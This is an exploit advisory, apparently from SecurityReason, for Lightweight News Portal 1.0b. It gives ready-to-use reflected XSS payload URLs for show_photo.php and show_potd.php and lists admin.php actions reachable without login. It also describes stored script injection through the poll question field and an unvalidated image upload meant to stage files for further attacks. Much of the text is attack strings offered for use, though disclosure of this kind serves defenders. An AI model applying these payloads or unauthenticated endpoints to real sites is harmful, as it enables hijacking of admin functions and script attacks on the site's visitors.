SecurityReason - Lightweight News Portal [LNP] 1.0b Multiple Remote Vulnerabilities ( Exploit )

Exploit Code :

____ _ _ _ ___ __ _ __
/ ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __
__ _
| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \|
'__/ _` |
| |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | |
(_| |
\____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_|
\__, |
---------------------------------------------------------------------------
|___/
Exploit found by sToRm

LNP: Lightweight news Portal v1.0-BETA
Multiple Remote Vulnerabilities

Cross-Site Scripting
--------------------

show_photo.php?photo="><script>javascript:alert(document.domain)</script>
show_potd.php?potd="><script>javascript:alert(document.domain)</script>

Insecure Administration
-----------------------

The admin page faces us with a login, but many important functions are
allowed
to be executed without a logged-in session.

admin.php?A=potd_delete
admin.php?A=potd
admin.php?A=vote_update
admin.php?A=vote
admin.php?A=modifynews

Permanent Code Injection
------------------------

admin.php?A=vote

"Current question" field allows for code injection, allowing us to force
all users browsing the poll to view an XSS or browser exploit.

File Upload
-----------

admin.php?A=potd

The "picture of the day" manager allows for further images to be
uploaded, but does not check for image validity. Although a phpshell
cannot be executed through this method, a source may be uploaded for
inclusion in further attacks, possibly an LFI somewhere on the server.